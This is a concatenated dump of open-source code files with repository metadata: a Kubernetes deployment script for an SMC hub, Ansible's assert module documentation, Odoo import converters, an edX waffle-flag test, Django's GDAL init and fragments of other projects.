# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from slicc.ast.AST import AST
class TypeFieldAST(AST):
def __init__(self, slicc, pairs):
super(TypeFieldAST, self).__init__(slicc, pairs)
|
bsd-3-clause
|
tapanagupta/mi-instrument
|
mi/platform/test/test_mission_exec.py
|
9
|
1320
|
# #!/usr/bin/env python
#
# """
# @package ion.agents.platform.test.test_mission_exec
# @file ion/agents/platform/test/test_mission_exec.py
# @author Edward Hunter
# @brief Test cases for mission exec opt-in classes.
# """
#
# __author__ = 'Edward Hunter'
# __license__ = 'Apache 2.0'
#
# # Import pyon test class first.
# from pyon.util.int_test import IonIntegrationTestCase
#
#
# # Nose imports.
# from nose.plugins.attrib import attr
#
# # bin/nosetests -sv --nologcapture ion/agents/platform/test/test_mission_exec.py:TestMissionExec
# # bin/nosetests -sv --nologcapture ion/agents/platform/test/test_mission_exec.py:TestMissionExec.test_mission_loader
# # bin/nosetests -sv --nologcapture ion/agents/platform/test/test_mission_exec.py:TestMissionExec.test_mission_exec
#
#
# @attr('INT', group='sa')
# class TestMissionExec(IonIntegrationTestCase):
# """
# Test cases for mission exec opt-in classes.
# """
#
# def setUp(self):
# """
# Common test setup.
# @return:
# """
# pass
#
#
# def test_mission_loader(self):
# """
# Test mission loader class.
# @return:
# """
# pass
#
#
# def test_mission_exec(self):
# """
# Test mission executive class.
# @return:
# """
# pass
|
bsd-2-clause
|
timothyclemansinsea/smc
|
src/k8s/smc-hub/control.py
|
1
|
9152
|
#!/usr/bin/env python3
"""
Hub management script
"""
import os, shutil, sys, tempfile
join = os.path.join
# Boilerplate to ensure we are in the directory of this script and to make the util module available.
SCRIPT_PATH = os.path.split(os.path.realpath(__file__))[0]
sys.path.insert(0, os.path.abspath(os.path.join(SCRIPT_PATH, '..', 'util')))
os.chdir(SCRIPT_PATH)
import util
# For now in all cases, we just call the container the following; really it should
# maybe be smc-webapp-static#sha1hash, which makes switching between versions easy, etc.
NAME='smc-hub'
SECRETS = os.path.abspath(join(SCRIPT_PATH, '..', '..', 'data', 'secrets'))
def build(tag, rebuild, upgrade=False, commit=None):
"""
Build Docker container by installing and building everything inside the container itself, and
NOT using ../../static/ on host.
"""
# First build smc-hub-base, which is generic install of ubuntu packages, so we should rarely
# clear the cache for this.
v = ['sudo', 'docker', 'build', '-t', '{name}-base'.format(name=NAME)]
if upgrade:
v.append("--no-cache")
v.append(".")
util.run(v, path=join(SCRIPT_PATH, 'image-base'))
# Next build smc-hub, which depends on smc-hub-base.
v = ['sudo', 'docker', 'build', '-t', tag]
if commit:
v.append("--build-arg")
v.append("commit={commit}".format(commit=commit))
if rebuild: # will cause a git pull to happen
v.append("--no-cache")
v.append('.')
util.run(v, path=join(SCRIPT_PATH,'image'))
def build_docker(args):
if args.commit:
args.tag += ('-' if args.tag else '') + args.commit[:6]
tag = util.get_tag(args, NAME)
build(tag, args.rebuild, args.upgrade, args.commit)
if not args.local:
util.gcloud_docker_push(tag)
def run_on_kubernetes(args):
if args.test:
rethink_cpu_request = hub_cpu_request = '10m'
rethink_memory_request = hub_memory_request = '200Mi'
else:
hub_cpu_request = '300m'
hub_memory_request = '1Gi'
rethink_cpu_request = '300m'
rethink_memory_request = '1Gi'
util.ensure_secret_exists('sendgrid-api-key', 'sendgrid')
util.ensure_secret_exists('zendesk-api-key', 'zendesk')
args.local = False # so tag is for gcloud
if args.replicas is None:
args.replicas = util.get_desired_replicas(NAME, 2)
tag = util.get_tag(args, NAME, build)
opts = {
'image_hub' : tag,
'replicas' : args.replicas,
'pull_policy' : util.pull_policy(args),
'min_read_seconds' : args.gentle,
'smc_db_hosts' : args.database_nodes,
'smc_db_pool' : args.database_pool_size,
'smc_db_concurrent_warn' : args.database_concurrent_warn,
'hub_cpu_request' : hub_cpu_request,
'hub_memory_request' : hub_memory_request,
'rethink_cpu_request' : rethink_cpu_request,
'rethink_memory_request' : rethink_memory_request
}
if args.database_nodes == 'localhost':
from argparse import Namespace
ns = Namespace(tag=args.rethinkdb_proxy_tag, local=False)
opts['image_rethinkdb_proxy'] = util.get_tag(ns, 'rethinkdb-proxy', build)
filename = 'smc-hub-rethinkdb-proxy.template.yaml'
else:
filename = '{name}.template.yaml'.format(name=NAME)
t = open(join('conf', filename)).read()
with tempfile.NamedTemporaryFile(suffix='.yaml', mode='w') as tmp:
r = t.format(**opts)
#print(r)
tmp.write(r)
tmp.flush()
util.update_deployment(tmp.name)
if NAME not in util.get_services():
util.run(['kubectl', 'expose', 'deployment', NAME])
def stop_on_kubernetes(args):
util.stop_deployment(NAME)
def load_secret(name, args):
path = args.path
if not os.path.exists(path):
os.makedirs(path)
if not os.path.isdir(path):
raise RuntimeError("path='{path}' must be a directory".format(path=path))
file = join(path, name)
if not os.path.exists(file):
raise RuntimeError("'{file}' must exist".format(file=file))
util.create_secret(name+'-api-key', file)
def status(args):
# Get all pod names
v = util.get_pods(run=NAME)
print("Getting last %s lines of logs from %s pods"%(args.tail, len(v)))
for x in v:
lg = util.get_logs(x['NAME'], tail=args.tail, container='smc-hub').splitlines()
blocked = concurrent = 0
for w in lg:
if 'BLOCKED for' in w: # 2016-07-07T17:39:23.159Z - debug: BLOCKED for 1925ms
b = int(w.split()[-1][:-2])
blocked = max(blocked, b)
if 'concurrent]' in w: # 2016-07-07T17:41:16.226Z - debug: [1 concurrent] ...
concurrent = max(concurrent, int(w.split()[3][1:]))
x['blocked'] = blocked
x['concurrent'] = concurrent
bad = util.run("kubectl describe pod {name} |grep Unhealthy |tail -1 ".format(name=x['NAME']), get_output=True, verbose=False).splitlines()
if len(bad) > 0:
x['unhealthy'] = bad[-1].split()[0]
else:
x['unhealthy'] = ''
print("%-30s%-12s%-12s%-12s%-12s%-12s"%('NAME', 'CONCURRENT', 'BLOCKED', 'UNHEALTHY', 'RESTARTS', 'AGE'))
for x in v:
print("%-30s%-12s%-12s%-12s%-12s%-12s"%(x['NAME'], x['concurrent'], x['blocked'], x['unhealthy'], x['RESTARTS'], x['AGE']))
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Control deployment of {name}'.format(name=NAME))
subparsers = parser.add_subparsers(help='sub-command help')
sub = subparsers.add_parser('build', help='build docker image')
sub.add_argument("-t", "--tag", default="", help="tag for this build")
sub.add_argument("-c", "--commit", default='',
help="build a particular sha1 commit; the commit is automatically appended to the tag")
sub.add_argument("-r", "--rebuild", action="store_true",
help="re-pull latest hub source code from git and install any dependencies")
sub.add_argument("-u", "--upgrade", action="store_true",
help="re-install the base Ubuntu packages")
sub.add_argument("-l", "--local", action="store_true",
help="only build the image locally; don't push it to gcloud docker repo")
sub.set_defaults(func=build_docker)
sub = subparsers.add_parser('run', help='create/update {name} deployment on the currently selected kubernetes cluster'.format(name=NAME))
sub.add_argument("-t", "--tag", default="", help="tag of the image to run")
sub.add_argument("-r", "--replicas", default=None, help="number of replicas")
sub.add_argument("-f", "--force", action="store_true", help="force reload image in k8s")
sub.add_argument("-g", "--gentle", default=30, type=int,
help="how gentle to be in doing the rolling update; in particular, will wait about this many seconds after each pod starts up (default: 30)")
sub.add_argument("-d", "--database-nodes", default='localhost', type=str, help="database to connect to. If 'localhost' (the default), will run a local rethindkb proxy that is itself pointed at the rethinkdb-cluster service; if 'rethinkdb-proxy' will use that service.")
sub.add_argument("-p", "--database-pool-size", default=50, type=int, help="size of database connection pool")
sub.add_argument("--database-concurrent-warn", default=300, type=int, help="if this many concurrent queries for sustained time, kill container")
sub.add_argument("--rethinkdb-proxy-tag", default="", help="tag of rethinkdb-proxy image to run")
sub.add_argument("--test", action="store_true", help="using for testing so make very minimal resource requirements")
sub.set_defaults(func=run_on_kubernetes)
sub = subparsers.add_parser('delete', help='delete the deployment')
sub.set_defaults(func=stop_on_kubernetes)
sub = subparsers.add_parser('load-sendgrid', help='load the sendgrid password into k8s from disk',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
sub.add_argument('path', type=str, help='path to directory that contains the password in a file named "sendgrid"')
sub.set_defaults(func=lambda args: load_secret('sendgrid',args))
sub = subparsers.add_parser('load-zendesk', help='load the zendesk password into k8s from disk',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
sub.add_argument('path', type=str, help='path to directory that contains the password in a file named "zendesk"')
sub.set_defaults(func=lambda args: load_secret('zendesk',args))
util.add_deployment_parsers(NAME, subparsers, default_container='smc-hub')
sub = subparsers.add_parser('status', help='display status info about concurrent and blocked, based on recent logs')
sub.add_argument("-t", "--tail", default=100, type=int, help="how far back to go in log")
sub.set_defaults(func=status)
args = parser.parse_args()
if hasattr(args, 'func'):
args.func(args)
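# Example invocations, assuming kubectl and gcloud are already configured;
# tags and paths below are illustrative:
#   ./control.py build -t mytag -l           # build the image locally only
#   ./control.py run -t mytag -r 2           # deploy with 2 replicas
#   ./control.py load-sendgrid /path/to/secrets
#   ./control.py status -t 200               # scan last 200 log lines per pod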
|
gpl-3.0
|
albertomurillo/ansible
|
lib/ansible/modules/utilities/logic/assert.py
|
45
|
2312
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2012, Dag Wieers <dag@wieers.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = r'''
---
module: assert
short_description: Asserts given expressions are true
description:
- This module asserts that given expressions are true with an optional custom message.
- This module is also supported for Windows targets.
version_added: "1.5"
options:
that:
description:
- A list of string expressions of the same form that can be passed to the 'when' statement.
type: list
required: true
fail_msg:
description:
- The customized message used for a failing assertion.
- This argument was called 'msg' before Ansible 2.7; it was renamed to 'fail_msg', keeping 'msg' as an alias.
type: str
aliases: [ msg ]
version_added: "2.7"
success_msg:
description:
- The customized message used for a successful assertion.
type: str
version_added: "2.7"
quiet:
description:
- Set this to C(yes) to avoid verbose output.
type: bool
default: no
version_added: "2.8"
notes:
- This module is also supported for Windows targets.
seealso:
- module: debug
- module: fail
- module: meta
author:
- Ansible Core Team
- Michael DeHaan
'''
EXAMPLES = r'''
- assert: { that: "ansible_os_family != 'RedHat'" }
- assert:
that:
- "'foo' in some_command_result.stdout"
- number_of_the_counting == 3
- name: After version 2.7 both 'msg' and 'fail_msg' can customize failing assertion message
assert:
that:
- my_param <= 100
- my_param >= 0
fail_msg: "'my_param' must be between 0 and 100"
success_msg: "'my_param' is between 0 and 100"
- name: Please use 'msg' when the Ansible version is older than 2.7
assert:
that:
- my_param <= 100
- my_param >= 0
msg: "'my_param' must be between 0 and 100"
- name: use quiet to avoid verbose output
assert:
that:
- my_param <= 100
- my_param >= 0
quiet: true
'''
|
gpl-3.0
|
ritchyteam/odoo
|
openerp/addons/base/ir/ir_fields.py
|
47
|
18497
|
# -*- coding: utf-8 -*-
import cStringIO
import datetime
import functools
import itertools
import time
import psycopg2
import pytz
from openerp.osv import orm
from openerp.tools.translate import _
from openerp.tools.misc import DEFAULT_SERVER_DATE_FORMAT,\
DEFAULT_SERVER_DATETIME_FORMAT,\
ustr
from openerp.tools import html_sanitize
REFERENCING_FIELDS = set([None, 'id', '.id'])
def only_ref_fields(record):
return dict((k, v) for k, v in record.iteritems()
if k in REFERENCING_FIELDS)
def exclude_ref_fields(record):
return dict((k, v) for k, v in record.iteritems()
if k not in REFERENCING_FIELDS)
CREATE = lambda values: (0, False, values)
UPDATE = lambda id, values: (1, id, values)
DELETE = lambda id: (2, id, False)
FORGET = lambda id: (3, id, False)
LINK_TO = lambda id: (4, id, False)
DELETE_ALL = lambda: (5, False, False)
REPLACE_WITH = lambda ids: (6, False, ids)
class ImportWarning(Warning):
""" Used to send warnings upwards the stack during the import process """
pass
class ConversionNotFound(ValueError): pass
class ColumnWrapper(object):
def __init__(self, column, cr, uid, pool, fromtype, context=None):
self._converter = None
self._column = column
if column._obj:
self._pool = pool
self._converter_args = {
'cr': cr,
'uid': uid,
'model': pool[column._obj],
'fromtype': fromtype,
'context': context
}
@property
def converter(self):
if not self._converter:
self._converter = self._pool['ir.fields.converter'].for_model(
**self._converter_args)
return self._converter
def __getattr__(self, item):
return getattr(self._column, item)
class ir_fields_converter(orm.Model):
_name = 'ir.fields.converter'
def for_model(self, cr, uid, model, fromtype=str, context=None):
""" Returns a converter object for the model. A converter is a
callable taking a record-ish (a dictionary representing an openerp
record with values of typetag ``fromtype``) and returning a converted
record matching what :meth:`openerp.osv.orm.Model.write` expects.
:param model: :class:`openerp.osv.orm.Model` for the conversion base
:returns: a converter callable
:rtype: (record: dict, logger: (field, error) -> None) -> dict
"""
columns = dict(
(k, ColumnWrapper(v.column, cr, uid, self.pool, fromtype, context))
for k, v in model._all_columns.iteritems())
converters = dict(
(k, self.to_field(cr, uid, model, column, fromtype, context))
for k, column in columns.iteritems())
def fn(record, log):
converted = {}
for field, value in record.iteritems():
if field in (None, 'id', '.id'): continue
if not value:
converted[field] = False
continue
try:
converted[field], ws = converters[field](value)
for w in ws:
if isinstance(w, basestring):
# wrap warning string in an ImportWarning for
# uniform handling
w = ImportWarning(w)
log(field, w)
except ValueError, e:
log(field, e)
return converted
return fn
def to_field(self, cr, uid, model, column, fromtype=str, context=None):
""" Fetches a converter for the provided column object, from the
specified type.
A converter is simply a callable taking a value of type ``fromtype``
(or a composite of ``fromtype``, e.g. list or dict) and returning a
value acceptable for a write() on the column ``column``.
By default, tries to get a method on itself with a name matching the
pattern ``_$fromtype_to_$column._type`` and returns it.
Converter callables can either return a value and a list of warnings
to their caller or raise ``ValueError``, which will be interpreted as a
validation & conversion failure.
ValueError can have either one or two parameters. The first parameter
is mandatory, **must** be a unicode string and will be used as the
user-visible message for the error (it should be translatable and
translated). It can contain a ``field`` named format placeholder so the
caller can inject the field's translated, user-facing name (@string).
The second parameter is optional and, if provided, must be a mapping.
This mapping will be merged into the error dictionary returned to the
client.
If a converter can perform its function but has to make assumptions
about the data, it can send a warning to the user through adding an
instance of :class:`~.ImportWarning` to the second value
it returns. The handling of a warning at the upper levels is the same
as ``ValueError`` above.
:param column: column object to generate a value for
:type column: :class:`fields._column`
:param fromtype: type to convert to something fitting for ``column``
:type fromtype: type | str
:param context: openerp request context
:return: a function (fromtype -> column.write_type), if a converter is found
:rtype: Callable | None
"""
assert isinstance(fromtype, (type, str))
# FIXME: return None
typename = fromtype.__name__ if isinstance(fromtype, type) else fromtype
converter = getattr(
self, '_%s_to_%s' % (typename, column._type), None)
if not converter: return None
return functools.partial(
converter, cr, uid, model, column, context=context)
def _str_to_boolean(self, cr, uid, model, column, value, context=None):
# all translatables used for booleans
true, yes, false, no = _(u"true"), _(u"yes"), _(u"false"), _(u"no")
# potentially broken casefolding? What about locales?
trues = set(word.lower() for word in itertools.chain(
[u'1', u"true", u"yes"], # don't use potentially translated values
self._get_translations(cr, uid, ['code'], u"true", context=context),
self._get_translations(cr, uid, ['code'], u"yes", context=context),
))
if value.lower() in trues: return True, []
# potentially broken casefolding? What about locales?
falses = set(word.lower() for word in itertools.chain(
[u'', u"0", u"false", u"no"],
self._get_translations(cr, uid, ['code'], u"false", context=context),
self._get_translations(cr, uid, ['code'], u"no", context=context),
))
if value.lower() in falses: return False, []
return True, [ImportWarning(
_(u"Unknown value '%s' for boolean field '%%(field)s', assuming '%s'")
% (value, yes), {
'moreinfo': _(u"Use '1' for yes and '0' for no")
})]
def _str_to_integer(self, cr, uid, model, column, value, context=None):
try:
return int(value), []
except ValueError:
raise ValueError(
_(u"'%s' does not seem to be an integer for field '%%(field)s'")
% value)
def _str_to_float(self, cr, uid, model, column, value, context=None):
try:
return float(value), []
except ValueError:
raise ValueError(
_(u"'%s' does not seem to be a number for field '%%(field)s'")
% value)
def _str_id(self, cr, uid, model, column, value, context=None):
return value, []
_str_to_reference = _str_to_char = _str_to_text = _str_to_binary = _str_to_html = _str_id
def _str_to_date(self, cr, uid, model, column, value, context=None):
try:
time.strptime(value, DEFAULT_SERVER_DATE_FORMAT)
return value, []
except ValueError:
raise ValueError(
_(u"'%s' does not seem to be a valid date for field '%%(field)s'") % value, {
'moreinfo': _(u"Use the format '%s'") % u"2012-12-31"
})
def _input_tz(self, cr, uid, context):
# if there's a tz in context, try to use that
if context.get('tz'):
try:
return pytz.timezone(context['tz'])
except pytz.UnknownTimeZoneError:
pass
# if the current user has a tz set, try to use that
user = self.pool['res.users'].read(
cr, uid, [uid], ['tz'], context=context)[0]
if user['tz']:
try:
return pytz.timezone(user['tz'])
except pytz.UnknownTimeZoneError:
pass
# fallback if no tz in context or on user: UTC
return pytz.UTC
def _str_to_datetime(self, cr, uid, model, column, value, context=None):
if context is None: context = {}
try:
parsed_value = datetime.datetime.strptime(
value, DEFAULT_SERVER_DATETIME_FORMAT)
except ValueError:
raise ValueError(
_(u"'%s' does not seem to be a valid datetime for field '%%(field)s'") % value, {
'moreinfo': _(u"Use the format '%s'") % u"2012-12-31 23:59:59"
})
# apply the input tz to the parsed naive datetime
input_tz = self._input_tz(cr, uid, context)
dt = input_tz.localize(parsed_value, is_dst=False)
# And convert to UTC before reformatting for writing
return dt.astimezone(pytz.UTC).strftime(DEFAULT_SERVER_DATETIME_FORMAT), []
def _get_translations(self, cr, uid, types, src, context):
types = tuple(types)
# Cache translations so they don't have to be reloaded from scratch on
# every row of the file
tnx_cache = cr.cache.setdefault(self._name, {})
if tnx_cache.setdefault(types, {}) and src in tnx_cache[types]:
return tnx_cache[types][src]
Translations = self.pool['ir.translation']
tnx_ids = Translations.search(
cr, uid, [('type', 'in', types), ('src', '=', src)], context=context)
tnx = Translations.read(cr, uid, tnx_ids, ['value'], context=context)
result = tnx_cache[types][src] = [t['value'] for t in tnx if t['value'] is not False]
return result
def _str_to_selection(self, cr, uid, model, column, value, context=None):
selection = column.selection
if not isinstance(selection, (tuple, list)):
# FIXME: Don't pass context to avoid translations?
# Or just copy context & remove lang?
selection = selection(model, cr, uid, context=None)
for item, label in selection:
label = ustr(label)
labels = self._get_translations(
cr, uid, ('selection', 'model', 'code'), label, context=context)
labels.append(label)
if value == unicode(item) or value in labels:
return item, []
raise ValueError(
_(u"Value '%s' not found in selection field '%%(field)s'") % (
value), {
'moreinfo': [_label or unicode(item) for item, _label in selection
if _label or item]
})
def db_id_for(self, cr, uid, model, column, subfield, value, context=None):
""" Finds a database id for the reference ``value`` in the referencing
subfield ``subfield`` of the provided column of the provided model.
:param model: model to which the column belongs
:param column: relational column for which references are provided
:param subfield: a relational subfield allowing building of refs to
existing records: ``None`` for a name_get/name_search,
``id`` for an external id and ``.id`` for a database
id
:param value: value of the reference to match to an actual record
:param context: OpenERP request context
:return: a pair of the matched database identifier (if any), the
translated user-readable name for the field and the list of
warnings
:rtype: (ID|None, unicode, list)
"""
if context is None: context = {}
id = None
warnings = []
action = {'type': 'ir.actions.act_window', 'target': 'new',
'view_mode': 'tree,form', 'view_type': 'form',
'views': [(False, 'tree'), (False, 'form')],
'help': _(u"See all possible values")}
if subfield is None:
action['res_model'] = column._obj
elif subfield in ('id', '.id'):
action['res_model'] = 'ir.model.data'
action['domain'] = [('model', '=', column._obj)]
RelatedModel = self.pool[column._obj]
if subfield == '.id':
field_type = _(u"database id")
try: tentative_id = int(value)
except ValueError: tentative_id = value
try:
if RelatedModel.search(cr, uid, [('id', '=', tentative_id)],
context=context):
id = tentative_id
except psycopg2.DataError:
# type error
raise ValueError(
_(u"Invalid database id '%s' for the field '%%(field)s'") % value,
{'moreinfo': action})
elif subfield == 'id':
field_type = _(u"external id")
if '.' in value:
module, xid = value.split('.', 1)
else:
module, xid = context.get('_import_current_module', ''), value
ModelData = self.pool['ir.model.data']
try:
_model, id = ModelData.get_object_reference(
cr, uid, module, xid)
except ValueError: pass # leave id as None
elif subfield is None:
field_type = _(u"name")
ids = RelatedModel.name_search(
cr, uid, name=value, operator='=', context=context)
if ids:
if len(ids) > 1:
warnings.append(ImportWarning(
_(u"Found multiple matches for field '%%(field)s' (%d matches)")
% (len(ids))))
id, _name = ids[0]
else:
raise Exception(_(u"Unknown sub-field '%s'") % subfield)
if id is None:
raise ValueError(
_(u"No matching record found for %(field_type)s '%(value)s' in field '%%(field)s'")
% {'field_type': field_type, 'value': value},
{'moreinfo': action})
return id, field_type, warnings
def _referencing_subfield(self, record):
""" Checks the record for the subfields allowing referencing (an
existing record in an other table), errors out if it finds potential
conflicts (multiple referencing subfields) or non-referencing subfields,
and returns the name of the correct subfield.
:param record:
:return: the record subfield to use for referencing and a list of warnings
:rtype: str, list
"""
# Can import by name_get, external id or database id
fieldset = set(record.iterkeys())
if fieldset - REFERENCING_FIELDS:
raise ValueError(
_(u"Can not create Many-To-One records indirectly, import the field separately"))
if len(fieldset) > 1:
raise ValueError(
_(u"Ambiguous specification for field '%(field)s', only provide one of name, external id or database id"))
# only one field left possible, unpack
[subfield] = fieldset
return subfield, []
def _str_to_many2one(self, cr, uid, model, column, values, context=None):
# Should only be one record, unpack
[record] = values
subfield, w1 = self._referencing_subfield(record)
reference = record[subfield]
id, subfield_type, w2 = self.db_id_for(
cr, uid, model, column, subfield, reference, context=context)
return id, w1 + w2
def _str_to_many2many(self, cr, uid, model, column, value, context=None):
[record] = value
subfield, warnings = self._referencing_subfield(record)
ids = []
for reference in record[subfield].split(','):
id, subfield_type, ws = self.db_id_for(
cr, uid, model, column, subfield, reference, context=context)
ids.append(id)
warnings.extend(ws)
return [REPLACE_WITH(ids)], warnings
def _str_to_one2many(self, cr, uid, model, column, records, context=None):
commands = []
warnings = []
if len(records) == 1 and exclude_ref_fields(records[0]) == {}:
# only one row with only ref field, field=ref1,ref2,ref3 as in
# m2o/m2m
record = records[0]
subfield, ws = self._referencing_subfield(record)
warnings.extend(ws)
# transform [{subfield:ref1,ref2,ref3}] into
# [{subfield:ref1},{subfield:ref2},{subfield:ref3}]
records = ({subfield:item} for item in record[subfield].split(','))
def log(_, e):
if not isinstance(e, Warning):
raise e
warnings.append(e)
for record in records:
id = None
refs = only_ref_fields(record)
# there are ref fields in the record
if refs:
subfield, w1 = self._referencing_subfield(refs)
warnings.extend(w1)
reference = record[subfield]
id, subfield_type, w2 = self.db_id_for(
cr, uid, model, column, subfield, reference, context=context)
warnings.extend(w2)
writable = column.converter(exclude_ref_fields(record), log)
if id:
commands.append(LINK_TO(id))
commands.append(UPDATE(id, writable))
else:
commands.append(CREATE(writable))
return commands, warnings
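# A minimal standalone sketch of the naming-convention dispatch that
# to_field() performs above (a hypothetical toy class, not part of this
# module):
class _MiniConverter(object):
    def _str_to_integer(self, value):
        return int(value), []
    def to_field(self, fromtype, column_type):
        # mirrors the '_%s_to_%s' lookup in ir_fields_converter.to_field
        return getattr(self, '_%s_to_%s' % (fromtype.__name__, column_type), None)
# e.g. _MiniConverter().to_field(str, 'integer')('42') evaluates to (42, [])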
|
agpl-3.0
|
ashishnitinpatil/vnitstudnotifs
|
django/contrib/gis/gdal/__init__.py
|
115
|
2134
|
"""
This module houses ctypes interfaces for GDAL objects. The following GDAL
objects are supported:
CoordTransform: Used for coordinate transformations from one spatial
reference system to another.
Driver: Wraps an OGR data source driver.
DataSource: Wrapper for the OGR data source object, supports
OGR-supported data sources.
Envelope: A ctypes structure for bounding boxes (GDAL library
not required).
OGRGeometry: Object for accessing OGR Geometry functionality.
OGRGeomType: A class for representing the different OGR Geometry
types (GDAL library not required).
SpatialReference: Represents OSR Spatial Reference objects.
The GDAL library will be imported from the system path using the default
library name for the current OS. The default library path may be overridden
by setting `GDAL_LIBRARY_PATH` in your settings with the path to the GDAL C
library on your system.
GDAL links to a large number of external libraries that consume RAM when
loaded. Thus, it may be desirable to disable GDAL on systems with limited
RAM resources -- this may be accomplished by setting `GDAL_LIBRARY_PATH`
to a non-existent file location (e.g., `GDAL_LIBRARY_PATH='/null/path'`;
setting to None/False/'' will not work as a string must be given).
"""
from django.contrib.gis.gdal.error import check_err, OGRException, OGRIndexError, SRSException
from django.contrib.gis.gdal.geomtype import OGRGeomType
# Attempting to import objects that depend on the GDAL library. The
# HAS_GDAL flag will be set to True if the library is present on
# the system.
try:
from django.contrib.gis.gdal.driver import Driver
from django.contrib.gis.gdal.datasource import DataSource
from django.contrib.gis.gdal.libgdal import gdal_version, gdal_full_version, GDAL_VERSION
from django.contrib.gis.gdal.srs import SpatialReference, CoordTransform
from django.contrib.gis.gdal.geometries import OGRGeometry
HAS_GDAL = True
except OGRException:
HAS_GDAL = False
try:
from django.contrib.gis.gdal.envelope import Envelope
except ImportError:
# No ctypes, but don't raise an exception.
pass
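# A minimal usage sketch: guard GDAL-dependent code on the HAS_GDAL flag
# exported above (assumes Django settings are configured):
#
#   from django.contrib.gis import gdal
#   if gdal.HAS_GDAL:
#       print(gdal.gdal_version())
#   else:
#       print("GDAL unavailable; geometry features disabled")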
|
bsd-3-clause
|
philanthropy-u/edx-platform
|
openedx/core/djangoapps/waffle_utils/tests/test_models.py
|
4
|
1961
|
"""
Tests for waffle utils models.
"""
from ddt import data, ddt, unpack
from django.test import TestCase
from edx_django_utils.cache import RequestCache
from opaque_keys.edx.keys import CourseKey
from ..models import WaffleFlagCourseOverrideModel
@ddt
class WaffleFlagCourseOverrideTests(TestCase):
"""
Tests for the waffle flag course override model.
"""
WAFFLE_TEST_NAME = "waffle_test_course_override"
TEST_COURSE_KEY = CourseKey.from_string("edX/DemoX/Demo_Course")
OVERRIDE_CHOICES = WaffleFlagCourseOverrideModel.ALL_CHOICES
# Data format: ( is_enabled, override_choice, expected_result )
@data((True, OVERRIDE_CHOICES.on, OVERRIDE_CHOICES.on),
(True, OVERRIDE_CHOICES.off, OVERRIDE_CHOICES.off),
(False, OVERRIDE_CHOICES.on, OVERRIDE_CHOICES.unset))
@unpack
def test_setting_override(self, is_enabled, override_choice, expected_result):
RequestCache.clear_all_namespaces()
self.set_waffle_course_override(override_choice, is_enabled)
override_value = WaffleFlagCourseOverrideModel.override_value(
self.WAFFLE_TEST_NAME, self.TEST_COURSE_KEY
)
self.assertEqual(override_value, expected_result)
def test_setting_override_multiple_times(self):
RequestCache.clear_all_namespaces()
self.set_waffle_course_override(self.OVERRIDE_CHOICES.on)
self.set_waffle_course_override(self.OVERRIDE_CHOICES.off)
override_value = WaffleFlagCourseOverrideModel.override_value(
self.WAFFLE_TEST_NAME, self.TEST_COURSE_KEY
)
self.assertEqual(override_value, self.OVERRIDE_CHOICES.off)
def set_waffle_course_override(self, override_choice, is_enabled=True):
WaffleFlagCourseOverrideModel.objects.create(
waffle_flag=self.WAFFLE_TEST_NAME,
override_choice=override_choice,
enabled=is_enabled,
course_id=self.TEST_COURSE_KEY
)
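# A minimal sketch of reading an override outside the test suite; the names
# mirror the test case above and the course key is illustrative:
#
#   value = WaffleFlagCourseOverrideModel.override_value(
#       "waffle_test_course_override",
#       CourseKey.from_string("edX/DemoX/Demo_Course"),
#   )
#   # value is one of WaffleFlagCourseOverrideModel.ALL_CHOICES: on/off/unset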
|
agpl-3.0
|
Anaphory/libpgm
|
libpgm/pgmlearner.py
|
1
|
45576
|
# Copyright (c) 2012, CyberPoint International, LLC
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the CyberPoint International, LLC nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL CYBERPOINT INTERNATIONAL, LLC BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
This module provides tools to generate Bayesian networks that are "learned" from a data set. The learning process involves finding the Bayesian network that most accurately models data given as input -- in other words, finding the Bayesian network that makes the data set most likely. There are two major parts of Bayesian network learning: structure learning and parameter learning. Structure learning means finding the graph that most accurately depicts the dependencies detected in the data. Parameter learning means adjusting the parameters of the CPDs in a graph skeleton to most accurately model the data. This module has tools for both of these tasks.
'''
import copy
import itertools
try:
import numpy as np
except ImportError:
raise ImportError("numpy is not installed on your system.")
try:
from scipy.stats import chisquare
except ImportError:
raise ImportError("scipy is not installed on your system.")
from .nodedata import NodeData, StaticNodeData
from .graphskeleton import GraphSkeleton
from .discretebayesiannetwork import DiscreteBayesianNetwork
from .lgbayesiannetwork import LGBayesianNetwork
class PGMLearner():
'''
